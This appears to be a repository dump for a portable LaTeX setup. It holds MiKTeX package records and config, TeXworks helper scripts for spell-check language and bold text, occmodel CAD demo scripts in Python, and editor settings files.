[miktex-graphics-bin-2.8]
TimeInstalled=1256205826
[cleveref]
TimeInstalled=1313545713
[splitindex]
TimeInstalled=1313545913
[fancyvrb]
TimeInstalled=1313545818
[seminar]
TimeInstalled=1264143836
[beamer]
TimeInstalled=1264143753
[graphics]
TimeInstalled=1256205800
[menukeys]
TimeInstalled=1338907336
[preview]
TimeInstalled=1264143826
[arabtex]
TimeInstalled=1264143746
[miktex-texify-bin-2.8]
TimeInstalled=1256205834
[miktex-xetex-base]
TimeInstalled=1264143514
[geometry]
TimeInstalled=1256205799
[fancybox]
TimeInstalled=1264143765
[collectbox]
TimeInstalled=1338907352
[mhchem]
TimeInstalled=1264143807
[hoekwater]
TimeInstalled=1256205801
[miktex-freetype2-bin-2.8]
TimeInstalled=1256205824
[fourier]
TimeInstalled=1264143766
[pslatex]
TimeInstalled=1256205843
[tools]
TimeInstalled=1256205846
[miktex-hyph-french]
TimeInstalled=1256205826
[paralist]
TimeInstalled=1313545851
[microtype]
TimeInstalled=1313656016
[miktex-xdvipdfmx-bin-2.8]
TimeInstalled=1256205838
[fontspec]
TimeInstalled=1256205799
[bookman]
TimeInstalled=1256205796
[endfloat]
TimeInstalled=1313545724
[lettre]
TimeInstalled=1313545828
[miktex-makeindex-bin-2.8]
TimeInstalled=1256205827
[float]
TimeInstalled=1256205799
[revtex]
TimeInstalled=1264143835
[enctex]
TimeInstalled=1256205799
[wrapfig]
TimeInstalled=1264143876
[xetexref]
TimeInstalled=1256205846
[helvetic]
TimeInstalled=1256205801
[mflogo]
TimeInstalled=1256205817
[miktex-dvipdfmx-base-2.7]
TimeInstalled=1256205823
[miktex-dict-german]
TimeInstalled=1256205819
[ltxbase]
TimeInstalled=1256205817
[miktex-poppler-base]
TimeInstalled=1256205833
[miktex-mtprint-bin-2.8]
TimeInstalled=1256205829
[epsf]
TimeInstalled=1313545744
[luxi]
TimeInstalled=1264143793
[skak]
TimeInstalled=1313545739
[tugboat]
TimeInstalled=1264143875
[arphic]
TimeInstalled=1272028349
[csquotes]
TimeInstalled=1264143758
[upquote]
TimeInstalled=1346888485
[l3kernel]
TimeInstalled=1338906657
[fancyhdr]
TimeInstalled=1264143765
[memoir]
TimeInstalled=1264143805
[mongolian-babel]
TimeInstalled=1313545900
[subfig]
TimeInstalled=1264143839
[hyperref]
TimeInstalled=1264143390
[pgf]
TimeInstalled=1264143824
[marvosym]
TimeInstalled=1313545833
[bezos]
TimeInstalled=1264143755
[miktex-texware-bin-2.8]
TimeInstalled=1256205834
[xetex-pstricks]
TimeInstalled=1337869004
[miktex-web-bin-2.8]
TimeInstalled=1256205838
[animate]
TimeInstalled=1338907330
[ltxmisc]
TimeInstalled=1264143470
[lithuanian]
TimeInstalled=1313545892
[ae]
TimeInstalled=1256205787
[pstricks]
TimeInstalled=1264143713
[movie15]
TimeInstalled=1338904143
[miktex-zip-bin]
TimeInstalled=1256205838
[dinbrief]
TimeInstalled=1264143759
[miktex-cweb-base]
TimeInstalled=1256205818
[cm]
TimeInstalled=1256205796
[ec]
TimeInstalled=1256205799
[miktex-dvipdfmx-bin-2.8]
TimeInstalled=1256205823
[miktex-fonts-bin-2.8]
TimeInstalled=1256205824
[zhmetrics]
TimeInstalled=1264143901
[miktex-fontconfig-base]
TimeInstalled=1256205824
[xcolor]
TimeInstalled=1264143881
[oberdiek]
TimeInstalled=1264143684
[miktex-bin-2.8]
TimeInstalled=1256205818
[miktex-texworks-doc]
TimeInstalled=1256205836
[fp]
TimeInstalled=1338904165
[miktex-teckit-bin-2.8]
TimeInstalled=1256205834
[miktex-psutils-base]
TimeInstalled=1256205833
[miktex-gsf2pk-base]
TimeInstalled=1256205826
[makecmds]
TimeInstalled=1314706224
[prettyref]
TimeInstalled=1264143825
[miktex-metapost-bin-2.8]
TimeInstalled=1256205828
[miktex-freetype-base]
TimeInstalled=1256205824
[palatino]
TimeInstalled=1256205843
[cite]
TimeInstalled=1313545843
[wasysym]
TimeInstalled=1313545918
[algorithms]
TimeInstalled=1264143743
[miktex-mpm-bin-2.8]
TimeInstalled=1256205829
[lm]
TimeInstalled=1264143469
[xypic]
TimeInstalled=1256205847
[booktabs]
TimeInstalled=1264143756
[miktex-cjkutils-bin-2.8]
TimeInstalled=1256205818
[ms]
TimeInstalled=1313545760
[polyglossia]
TimeInstalled=1313545905
[rsfs]
TimeInstalled=1256205845
[tds]
TimeInstalled=1256205845
[xunicode]
TimeInstalled=1256205847
[miktex-bibtex8bit-base]
TimeInstalled=1256205818
[miktex-texinfo-base]
TimeInstalled=1256205834
[comment]
TimeInstalled=1346888479
[miktex-hyph-german]
TimeInstalled=1256205826
[zapfchan]
TimeInstalled=1256205847
[elsarticle]
TimeInstalled=1264143762
[miktex-metapost-base-2.7]
TimeInstalled=1256205828
[simplecv]
TimeInstalled=1264143837
[xetexurl]
TimeInstalled=1256205846
[miktex-mft-base]
TimeInstalled=1256205828
[times]
TimeInstalled=1256205845
[miktex-tex-bin-2.8]
TimeInstalled=1256205834
[eurosym]
TimeInstalled=1256205799
[miktex-tex-base]
TimeInstalled=1256205834
[pdftex-def]
TimeInstalled=1256205843
[tipa]
TimeInstalled=1264143871
[esint]
TimeInstalled=1264143763
[lastpage]
TimeInstalled=1313545732
[xgreek]
TimeInstalled=1264143714
[bibtopic]
TimeInstalled=1264143755
[natbib]
TimeInstalled=1264143810
<file_sep>;;; DO NOT EDIT THIS FILE!
[ft.tex]
extensions=
extensions;=.tex
extensions;=.src
path=.
path;=%R/tex/plain//
path;=%R/tex/generic//
path;=%R/tex//
[ft.enc]
path=.
path;=%R/fonts/enc//
;; <legacy>
path;=%R/pdftex//
path;=%R/dvips//
;; </legacy>
[ft.map]
path=.
path;=%R/fonts/map/pdftex//
path;=%R/fonts/map/dvips//
path;=%R/fonts/map//
;; <legacy>
path;=%R/pdftex//
path;=%R/dvips//
;; </legacy>
;;;
@<PASSWORD>
<file_sep>// TeXworksScript
// Title: Babel language
// Description: Looks for a Babel line to set the spell-check language
// Author: <NAME>
// Version: 0.1
// Date: 2009-11-21
// Script-Type: hook
// Hook: LoadFile
// NOTE: the comment header above is TeXworks script metadata (parsed at
// load time) — do not reformat or translate it.
//
// This LoadFile hook scans the document preamble for a
// \usepackage[...]{babel} line and switches the editor's spell-check
// dictionary to match. The regex captures the LAST bracket option,
// which Babel treats as the document's main language.
babelRE = new RegExp("\\\\usepackage\\[(?:.+,)*([^,]+)\\]\\{babel\\}");
// Map of Babel language names -> spell-check dictionary codes.
spellingDict = new Array();
// extend or customize this list as needed
spellingDict.czech = "cs_CZ";
spellingDict.german = "de_DE";
spellingDict.germanb = "de_DE";
spellingDict.ngerman = "de_DE";
spellingDict.greek = "el_GR";
spellingDict.english = "en_US";
spellingDict.USenglish = "en_US";
spellingDict.american = "en_US";
spellingDict.UKenglish = "en_GB";
spellingDict.british = "en_GB";
spellingDict.spanish = "es_ES";
spellingDict.french = "fr_FR";
spellingDict.francais = "fr_FR";
spellingDict.latin = "la_LA";
spellingDict.latvian = "lv_LV";
spellingDict.polish = "pl_PL";
spellingDict.brazilian = "pt_BR";
spellingDict.brazil = "pt_BR";
spellingDict.portuges = "pt_PT";
spellingDict.portuguese= "pt_PT";
spellingDict.russian = "ru_RU";
spellingDict.slovak = "sk_SK";
spellingDict.slovene = "sl_SL";
spellingDict.swedish = "sv_SV";
// get the text from the document window
// ("target" is the editor window object supplied by TeXworks)
txt = target.text;
lines = txt.split('\n');
result = undefined;
// look for a babel line...
for (i = 0; i < lines.length; ++i) {
line = lines[i];
matched = babelRE.exec(line);
if (matched) {
lang = matched[1];
// Only switch if the Babel language has a known dictionary mapping.
if (spellingDict[lang]) {
target.setSpellcheckLanguage(spellingDict[lang]);
result = "Set spell-check language to " + spellingDict[lang];
}
break;
}
// ...but give up at the end of the preamble
if (line.match("\\\\begin\\{document\\}")) {
break;
}
if (line.match("\\\\starttext")) { // oops, seems to be ConTeXt!
break;
}
}
// The value of this final expression is the script's result, reported
// back to TeXworks.
result;
<file_sep>extensions
===========
Dot, MySQL, sgw and portableLatex for Windows.<file_sep>#!/usr/bin/python2
# -*- coding: utf-8 -*-
# Demo / scratch script exercising the occmodel CAD API (an Open CASCADE
# wrapper). Each section overwrites e1/solid etc. with a fresh example;
# only the final values survive.
import sys
from math import *
from geotools import *
from gltools import *
from occmodel import *
from occmodelviewer import Viewer, viewer
# Edges: line, three-point arc, circle (each reassigns e1).
e1 = Edge().createLine(start = (0.,0.,0.), end = (1.,1.,0.))
e1 = Edge().createArc3P(start = (1.,0.,0.), end = (-1.,0.,0.), pnt = (0.,1.,0.))
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
# Bezier
start = Vertex(0.,0.,0.)
end = Vertex(1.,0.,0.)
pnts = ((0.,2.,0.), (1.,1.5,0.))
e1 = Edge().createBezier(start,end,pnts)
# Spline
start = Vertex(0.,0.,0.)
end = Vertex(1.,0.,0.)
pnts = ((0.,2.,0.), (5.,1.5,0.))
e1 = Edge().createSpline(start,end,pnts)
# face
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
f1 = Face().createConstrained(e1, ((0.,.5,.25),))
# face edge sequence
start = Vertex(1.,0.,0.)
end = Vertex(-1.,0.,0.)
e1 = Edge().createLine(end,start)
pnt = (0.,1.,0.)
e2 = Edge().createArc3P(start,end,pnt)
w1 = Wire().createWire((e1,e2))
f1 = Face().createFace(w1)
# polygon
pnts = ((0.,0.,0.), (0.,2.,0.), (1.,2.,0.), (1.,0.,0.))
f1 = Face().createPolygonal(pnts)
# sphere
solid = Solid()
solid.createSphere((1.,2.,3.),.5)
# box
solid = Solid().createBox((0.,0.,0.),(100.,100.,100.))
# cylinder
solid = Solid().createCylinder((0.,0.,0.),(0.,0.,1.), 1.)
# cone
solid = Solid().createCone((0.,0.,0.),(0.,0.,1.), 1., 2.)
# boolean union
s1 = Solid().createSphere((0.,0.,0.),.5)
s2 = Solid().createSphere((.25,0.,0.),.5)
s1.fuse(s2)
# boolean difference
s1 = Solid().createSphere((0.,0.,0.),.5)
s2 = Solid().createSphere((.25,0.,0.),.5)
s1.cut(s2)
# boolean intersection
s1 = Solid().createSphere((0.,0.,0.),.5)
s2 = Solid().createSphere((.25,0.,0.),.5)
s1.common(s2)
# extrude
pnts = (
(0.,0.,0.),
(0.,2.,0.),
(5.,1.5,0.),
(0.,0.,0.)
)
e1 = Edge().createSpline(points = pnts)
face = Face().createFace(e1)
solid = Solid().extrude(face, (0.,0.,0.), (0.,0.,5.))
# revolve
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
face = Face().createFace(e1)
solid = Solid().revolve(face, (0.,2.,0.), (1.,2.,0.), pi/2.)
# loaf
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
e2 = Edge().createEllipse(center=(0.,0.,5.),normal=(0.,0.,1.), rMajor = 2.0, rMinor=1.0)
e3 = Edge().createCircle(center=(0.,0.,10.),normal=(0.,0.,1.),radius = 1.0)
solid = Solid().loft((e1,e2,e3))
# pipe
e1 = Edge().createArc((0.,0.,0.),(2.,0.,2.),(2.,0.,0.))
e2 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
f1 = Face().createFace(e2)
solid = Solid().pipe(f1, e1)
print(solid.volume())
#print(dir(Viewer))
# Sweep a circular profile along an open polygonal path.
w1 = Wire().createPolygon((
(0.,0.,0.),
(0.,0.,1.),
(0.75,0.,1.),
(0.75,0.,0.)),
close = False
)
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 0.2)
mysolid = Solid().sweep(w1, e1)
print(mysolid.volume())
#coding: utf-8
# Uses the occmodel module to access the Open CASCADE library indirectly.
#from occmodel import *
# Build three circles, loft them into a solid, print its volume,
# and finally export the result as a loft.stp STEP file.
第一個圓 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.2)
第二個圓 = Edge().createCircle(center=(0.,0.,5.),normal=(0.,0.,1.),radius = 1.5)
第三個圓 = Edge().createCircle(center=(0.,0.,10.),normal=(0.,0.,1.),radius = 1.0)
solid = Solid().loft((第一個圓,第二個圓,第三個圓), True)
print (solid.volume())
# Note the bytes-filename workaround needed when exporting loft.stp.
Tools.writeSTEP(bytes('loft.stp'.encode("utf-8")),solid)
<file_sep>// TeXworksScript
// Title: Make Bold
// Description: Encloses the current selection in \textbf{}
// Author: <NAME>
// Version: 0.1
// Date: 2009-08-31
// Script-Type: standalone
// NOTE: the comment header above is TeXworks script metadata — keep as is.
// "target" is the editor window object supplied by TeXworks.
var txt = target.selection;
var len = txt.length;
// Replace the selection with \textbf{<selection>}.
target.insertText("\\textbf{" + txt + "}");
// After insertText the cursor sits past the closing brace; step back
// len+1 characters so the original text (inside the braces) is selected.
target.selectRange(target.selectionStart - len - 1, len);
<file_sep>[General]
launchOption=1
syntaxColoring=LaTeX
autoIndent=\x65e0
lineNumbers=true
wrapLines=true
tabWidth=32
font="\x5b8b\x4f53,9,-1,5,50,0,0,0,0,0"
language=\x65e0
scaleOption=1
previewScale=200
magnifierSize=2
circularMagnifier=true
defaultEngine=LaTeXify
autoHideConsole=true
openDialogDir=C:/Documents and Settings/amd/\x684c\x9762
recentFileList=C:/Documents and Settings/amd/\x684c\x9762/simple.tex, C:/Documents and Settings/amd/\x684c\x9762/untitled-1.tex, C:/Documents and Settings/amd/\x684c\x9762/test.tex, D:/LyTeX2/MyDoc/paper4/yen_python_intro.tex, C:/Documents and Settings/amd/\x684c\x9762/tt.tex, D:/LyTeX2/MyDoc/paper3/paper3.tex, C:/Documents and Settings/amd/\x684c\x9762/123333.tex, D:/LyTeX/MyDoc/yen2.tex, D:/LyTeX/MyDoc/test.tex, C:/Documents and Settings/amd/\x684c\x9762/14/yen1.tex
saveDialogDir=
<file_sep>#!/usr/bin/python2
# -*- coding: utf-8 -*-
#
# This file is part of occmodel - See LICENSE.txt
#
from math import pi, sin, cos, copysign
from occmodel import *
from occmodelviewer import viewer
import gltools as gl
'''
pnts = ((0.,0.,0.), (0.,2.,0.), (1.,2.,0.), (1.,0.,0.))
f1 = Face().createPolygonal(pnts)
print (f1)
print (f1.area())
'''
'''
start = Vertex(0.,0.,0.)
end = Vertex(1.,0.,0.)
pnts = ((0.,2.,0.), (1.,1.5,0.))
b1 = Edge().createBezier(start,end,pnts)
print (b1)
print (b1.length())
start = None
end = None
pnts = ((0.,0.,0.), (0.,2.,0.), (0.5,1.,0.), (1.,-1.,0.))
b1 = Edge().createBezier(start,end,pnts)
print (b1)
print (b1.length())
'''
'''
start = Vertex(0.,0.,0.)
end = Vertex(1.,0.,0.)
pnts = ((0.,2.,0.), (5.,1.5,0.))
s1 = Edge().createSpline(start,end,pnts)
print (s1)
print (s1.length())
'''
'''
start = None
end = None
pnts = ((0.,0.,0.),(0.,2.,0.), (5.,1.5,0.))
e1 = Edge().createSpline(start,end,pnts)
print (e1)
print (e1.length())
face = Face().createFace(e1)
print (face)
print (face.area())
solid = Solid().extrude(face, (0.,0.,0.), (0.,0.,5.))
print (solid)
print ('area = ', solid.area())
print ('volume = ', solid.volume())
'''
'''
start = Vertex(1.,0.,0.)
end = Vertex(-1.,0.,0.)
e1 = Edge().createLine(end,start)
print (e1)
print (e1.length())
pnt = (0.,1.,0.)
e2 = Edge().createArc3P(start,end,pnt)
print (e2)
print (e2.length())
face = Face().createFace((e1,e2), ((0.,.5,.5),))
print (face)
print (face.area())
solid = Solid().extrude(face, (0.,0.,0.), (0.,0.,5.))
print (solid)
print ('area = ', solid.area())
print ('volume = ', solid.volume())
viewer((face, e1), ('red', 'green'))
'''
# Active example: loft a solid through three stacked circles, report its
# volume, export it to STEP, and open it in the viewer.
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
e2 = Edge().createCircle(center=(0.,0.,5.),normal=(0.,0.,1.),radius = 1.5)
e3 = Edge().createCircle(center=(0.,0.,10.),normal=(0.,0.,1.),radius = 1.0)
# second argument presumably selects ruled lofting — TODO confirm
# against the occmodel Solid.loft documentation
solid = Solid().loft((e1,e2,e3), True)
print (solid.volume())
# writeSTEP is given a bytes filename here (Python 2/3 compat workaround).
Tools.writeSTEP(bytes('test.stp'.encode("utf-8")),solid)
viewer(solid)
'''
solid = Solid()
solid.readSTEP('test.stp')
solid.heal()
viewer(solid)
'''
'''
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
face = Face().createFace(e1)
print (face)
print (face.area())
print (face.inertia())
solid = Solid().extrude(face, (0.,0.,0.), (0.,0.,1.))
print (solid)
print ('area = ', solid.area())
print ('volume = ', solid.volume())
'''
'''
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
face = Face().createFace(e1)
print face
print face.area()
solid = Solid().revolve(face, (0.,2.,0.), (1.,2.,0.), 90.)
print (solid)
print ('area = ', solid.area())
print ('volume = ', solid.volume())
'''
'''
model = Model()
model.createSphere(1.,2.,3.,.5)
#model.translate(-1.,-2.,-3.)
model.rotate((0.,0.,0.),(1.,0.,0.), 15.)
model.writeSTEP('test.stp')
print (model)
'''
'''
solid = Solid()
solid.createSphere((1.,2.,3.),.5)
plane = Plane.fromNormal((1.,2.,3.), (0.,1.,1.))
sec = solid.section(plane)
print ('area = ', sec.area())
viewer(sec)
'''
'''
solid = Solid().createBox((0.,0.,0.),(100.,100.,100.))
solid.shell(-5, lambda near,far: near[2] > 50 and far[2] > 50)
solid.fillet(2., lambda near,far: True)
#solid.writeSTEP('test.stp')
viewer(solid)
'''
'''
s1 = Solid().createSphere((0.,0.,0.),.5)
s2 = Solid().createSphere((.25,0.,0.),.5)
#s1.booleanUnion(s2)
#s1.booleanDifference(s2)
s1.booleanIntersection(s2)
#s1.writeSTEP('test.stp')
print (s1.volume())
'''
'''
s1 = Solid().createSphere((0.,0.,0.),.5)
print (s1.centreOfMass())
s1.translate((1.,0.,0.))
print (s1.centreOfMass())
'''
'''
s1 = Solid().createSphere((0.,0.,0.),.5)
print (s1.volume())
s2 = Solid().createSphere((2.,0.,0.),.5)
print (s2.volume())
s3 = Solid().addSolids((s1,s2))
print (s3.volume())
'''
'''
sp1 = Solid().createSphere((0.,0.,0.),.5)
print sp1.volume()
sp2 = sp1.copy()
print sp1.volume()
sp2.translate((.5, 0., 0.))
#sp2.scale((.5, 0., 0.), 1.25)
sp2.rotate((0.,-1.,0.),(0.,1.,0.),10.)
sp1.booleanDifference(sp2)
'''
'''
sp1 = Solid().createCylinder((0.,0.,0.),(0.,0.,1.), 1.)
print (sp1.volume())
'''
'''
sp1 = Solid().createTorus((0.,0.,0.),(0.,0.,1.), 1., 2.)
print (sp1.volume())
'''
'''
c1 = Solid().createCone((0.,0.,0.),(0.,0.,1.), 1., 2.)
print (c1.volume())
'''
'''
b1 = Solid().createBox((0.,0.,0.),(1.,1.,1.))
print (b1.volume())
'''
'''
b1 = Solid().createBox((0.,0.,0.),(1.,1.,1.))
print b1.volume()
b1.fillet(.25, lambda start,end: start[2] > .5 and end[2] > .5)
print (b1.volume())
'''
'''
start = Vertex(0.,0.,0.)
end = Vertex(1.,0.,1.)
cen = (1.,0.,0.)
e1 = Edge().createArc(start,end,cen)
e2 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
face = Face().createFace(e2)
s1 = Solid().pipe(face, e1)
print (s1.volume())
'''
'''
p1 = Vertex(0.,0.,0.)
p2 = Vertex(1.,0.,0.)
p3 = Vertex(1.,1.,0.)
p4 = Vertex(0.,1.,0.)
e1 = Edge().createLine(p1,p2)
e2 = Edge().createLine(p2,p3)
e3 = Edge().createLine(p3,p4)
e4 = Edge().createLine(p4,p1)
face = Face().createFace((e1,e2,e3,e4))
print face.centreOfMass()
mesh = face.createMesh(0.1,.5)
print (mesh)
'''
'''
#solid = Solid().createSphere((0.,0.,0.),.5)
solid = Solid().createBox((0.,0.,0.),(1.,1.,1.))
mesh = solid.createMesh(0.1,.5)
print (mesh)
print (mesh.vertex(0))
print (mesh.normal(0))
print (mesh.triangle(0))
'''
'''
start = Vertex(1.,0.,0.)
end = Vertex(-1.,0.,0.)
pnt = (0.,1.,0.)
e1 = Edge().createArc3P(start,end,pnt)
print (e1.boundingBox())
pnts = (e1.tesselate())
print (pnts)
'''
'''
e1 = Edge().createHelix(.5, 2., 1.0, 0.)
print (e1.length())
print (e1.start)
print (e1.end)
'''
'''
p1 = Vertex(0.,0.,0.)
p2 = Vertex(1.,0.,0.)
p3 = Vertex(1.,1.,0.)
p4 = Vertex(0.,1.,0.)
e1 = Edge().createLine(p1,p2)
e2 = Edge().createLine(p2,p3)
e3 = Edge().createLine(p3,p4)
e4 = Edge().createLine(p4,p1)
w1 = Wire().createWire((e1,e2,e3,e4))
print w1.length()
f1 = Face().createFace(w1)
print (f1.area())
'''
'''
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
e2 = Edge().createEllipse(center=(0.,0.,5.),normal=(0.,0.,1.), rMajor = 2.0, rMinor=1.0)
e3 = Edge().createCircle(center=(0.,0.,10.),normal=(0.,0.,1.),radius = 1.0)
solid = Solid().loft((e1,e2,e3), False)
print (solid.volume())
'''
'''
rect = Wire().createRectangle(height = 2., radius = .5)
print (rect.length())
'''
'''
w1 = Wire().createRegularPolygon()
print w1.length()
f1 = Face().createFace(w1)
print (f1.area())
'''
'''
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
plane = Plane()
print (e1.hasPlane(plane = plane))
print (plane)
'''
'''
solid = Solid().createBox((0.,0.,0.),(1.,1.,1.))
e1 = Edge().createCircle(center=(0.5,0.,.5),normal=(0.,0.,1.),radius = 0.25)
e2 = Edge().createCircle(center=(0.5,0.5,1.),normal=(0.,0.,1.),radius = 0.1)
w1 = Wire().createWire(e2)
e3 = Edge().createCircle(center=(1.0,0.5,1.),normal=(0.,0.,1.),radius = 0.25)
f1 = Face().createFace(e3)
solid.cut((e1,w1,f1))
'''
'''
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
e2 = Edge().createCircle(center=(0.,0.,.5),normal=(0.,0.,1.),radius = 1.5)
v1 = Vertex(0.,0.,1.)
solid = Solid().loft((e1,e2,v1))
print (solid.volume())
'''
'''
w1 = Wire().createPolygon((
(0.,0.,0.),
(0.,0.,5.),
(5.,0.,5.)),
close = False
)
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
solid = Solid().sweep(w1, e1, cornerMode = SWEEP_RIGHT_CORNER)
print (solid.volume())
'''
'''
w1 = Wire().createPolygon((
(0.,0.,0.),
(1.,0.,0.),
(.5,1.,0.)),
close = True
)
f1 = Face().createFace(w1)
e1 = Edge().createCircle(center=(.5,.5,-1.),normal=(0.,0.,1.),radius = .15)
f1.booleanIntersection(e1)
#f1.booleanDifference(e1)
solid = Solid().extrude(f1, (0.,0.,0.), (0.,0.,1.))
solid.createMesh()
'''
'''
w1 = Wire().createPolygon((
(0.,0.,0.),
(0.,0.,5.),
(5.,0.,5.)),
close = False
)
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
solid = Solid().sweep(w1, e1, cornerMode = SWEEP_RIGHT_CORNER)
print (solid.volume())
'''
'''
start = Vertex(0.,0.,0.)
end = Vertex(1.,0.,1.)
cen = (1.,0.,0.)
e1 = Edge().createArc(start,end,cen)
e2 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
face = Face().createFace(e2)
e3 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = .8)
face.cut(e3)
s1 = Solid().pipe(face, e1)
print (s1.volume())
'''
'''
start = Vertex(0.,0.,0.)
end = Vertex(1.,0.,1.)
cen = (1.,0.,0.)
e1 = Edge().createArc(start,end,cen)
start = Vertex(0.,1.,0.)
end = Vertex(2.,1.,2.)
cen = (2.,1.,0.)
e2 = Edge().createArc(start,end,cen)
face = Face().loft((e1,e2))
print (face.isValid())
'''
'''
start = Vertex(0.,0.,0.)
end = Vertex(1.,0.,1.)
cen = (1.,0.,0.)
e1 = Edge().createArc(start,end,cen)
e2 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
face = Face().sweep(e2, e1)
print (face.isValid())
'''
'''
e1 = Edge().createCircle(center=(0.,0.,0.),normal=(0.,0.,1.),radius = 1.)
e2 = Edge().createCircle(center=(-1.,0.,0.),normal=(0.,0.,1.),radius = .5)
e3 = Edge().createCircle(center=(1.,0.,0.),normal=(0.,0.,1.),radius = .5)
w1 = Wire().createWire(e1)
print w1.length()
w1.cut((e2,e3))
print (w1.length())
'''
'''
face = Face().createPolygonal(((0.,0.,0.),(1.,1.,0.),(1.,1.,1.),(0.,0.,1.)))
e1 = Edge().createCircle(center=(.5,0.2,.5),normal=(0.,1.,0.),radius = .25)
w1 = Wire().createWire(e1)
w1.project(face)
print (w1.isValid())
'''
'''
p1 = Vertex(0.,0.,0.)
p2 = Vertex(1.,0.,0.)
p3 = Vertex(1.,1.,0.)
e1 = Edge().createLine(p1,p2)
e2 = Edge().createLine(p2,p3)
w1 = Wire().createWire((e1,e2))
#face = Face().extrude(w1, (0.,0.,0.),(0.,0.,1.))
face = Face().revolve(w1, (0.,0.,0.),(0.,1.,0.), 90.)
print (face.isValid())
#print face.typeName()
#Tools.writeSTEP('test.stp', face)
'''
#solid = Solid()
#solid.createSphere((1.,2.,3.),.5)
#print solid.shapeType()
#Tools.writeSTEP('test.stp', solid)
#Tools.writeBREP('test.brp', solid)
#Tools.writeSTL('test.stl', solid)
#Tools.writeVRML('test.wrl', solid)
# expected bytes, str found
#print (Tools.readSTEP('test.stp'))<file_sep>Your XMing should be located here.
http://sourceforge.net/projects/xming/<file_sep>;;; DO NOT EDIT THIS FILE!
[MPM]
AutoInstall=2
<file_sep>[General]
IniMode=true
[texmaker]
ToolBar\CentralVisible=true
StructureView\ShowLinenumbers=false
StructureView\Indentation=-1
Files\New%20File%20Encoding=UTF-8
Files\Auto%20Detect%20Encoding%20Of%20Loaded%20Files=true
Files\Max%20Recent%20Files=5
Files\Max%20Recent%20Projects=3
Files\Recent%20Project%20Files=@Invalid()
Files\RestoreSession=false
Files\Session\Files=S:/examples/simple.tex
Files\Session\curRows=@Variant(\0\0\0\t\0\0\0\x1\0\0\0\x2\0\0\0\0)
Files\Session\curCols=@Variant(\0\0\0\t\0\0\0\x1\0\0\0\x2\0\0\0\0)
Files\Session\firstLines=@Variant(\0\0\0\t\0\0\0\x1\0\0\0\x2\0\0\0\0)
Files\Session\MasterFile=
Files\Parse%20BibTeX=true
Files\Parse%20Master=true
Files\Autosave=0
Spell\DictionaryDir=S:/TeXstudio2.3/dictionaries
Spell\Language=de_DE
Spell\Dic=s:/TeXstudio2.3/dictionaries/de_DE.dic
Thesaurus\Database=s:/TeXstudio2.3/dictionaries/th_en_US_v2.dat
User\ToolNames=@Invalid()
User\Tools=@Invalid()
Editor\WordWrapMode=1
Editor\WrapLineWidth=80
Editor\Parentheses%20Matching=true
Editor\Parentheses%20Completion=true
Editor\Line%20Number%20Multiples=1
Editor\Cursor%20Surrounding%20Lines=5
Editor\Auto%20Indent=true
Editor\Weak%20Indent=true
Editor\Indent%20with%20Spaces=false
Editor\Folding=true
Editor\Show%20Line%20State=true
Editor\Show%20Cursor%20State=true
Editor\Real-Time%20Spellchecking=true
Editor\Check%20Spelling=true
Editor\Check%20Citations=true
Editor\Check%20References=true
Editor\Check%20Syntax=true
Editor\Show%20Whitespace=true
Editor\TabStop=4
Editor\ToolTip%20Help=true
Editor\ToolTip%20Preview=true
Editor\Replace%20Quotes=0
Editor\Display%20Modifytime=true
Editor\Close%20Search%20Replace%20Together=false
Editor\Use%20Line%20For%20Search=true
Editor\Search%20Only%20In%20Selection=true
Editor\Auto%20Replace%20Commands=true
Editor\Font%20Family=Courier New
Editor\Font%20Size=10
Editor\Esc%20for%20closing%20log=false
Editor\Mouse%20Wheel%20Zoom=true
Editor\Hack%20Auto%20Choose=true
Editor\Hack%20Disable%20Fixed%20Pitch=false
Editor\Hack%20Disable%20Width%20Cache=false
Editor\Hack%20Disable%20Line%20Cache=false
Editor\Hack%20Disable%20Accent%20Workaround=false
Editor\Hack%20Render%20Mode=0
Editor\Completion=true
Editor\Completion%20Case%20Sensitive=2
Editor\Completion%20Complete%20Common%20Prefix=true
Editor\Completion%20EOW%20Completes=true
Editor\Completion%20Enable%20Tooltip%20Help=true
Editor\Completion%20Use%20Placeholders=true
Editor\Completion%20Prefered%20Tab=0
Editor\Completion%20Tab%20Relative%20Font%20Size%20Percent=100
Dialogs\Last%20Hard%20Wrap%20Column=80
Dialogs\Last%20Hard%20Wrap%20Smart%20Scope%20Selection=false
Dialogs\Last%20Hard%20Wrap%20Join%20Lines=false
Tools\SingleViewerInstance=false
Tools\Show%20Log%20After%20Compiling=true
Tools\Show%20Stdout=1
Tools\Automatic%20Rerun%20Times=5
Tools\Auto%20Checkin%20after%20Save=false
Tools\SVN%20Undo=false
Tools\SVN%20KeywordSubstitution=false
Tools\SVN%20Search%20Path%20Depth=2
GUI\Style=false
GUI\Texmaker%20Palette=false
GUI\Use%20System%20Theme=true
X11\Font%20Family=\x65b0\x7d30\x660e\x9ad4
X11\Font%20Size=9
X11\Style=
Interface\Config%20Show%20Advanced%20Options=false
Interface\Config%20Riddled=false
LogView\Tabbed=true
Interface\New%20Left%20Panel%20Layout=true
Interface\Language=
Preview\Mode=4
Preview\Auto%20Preview=1
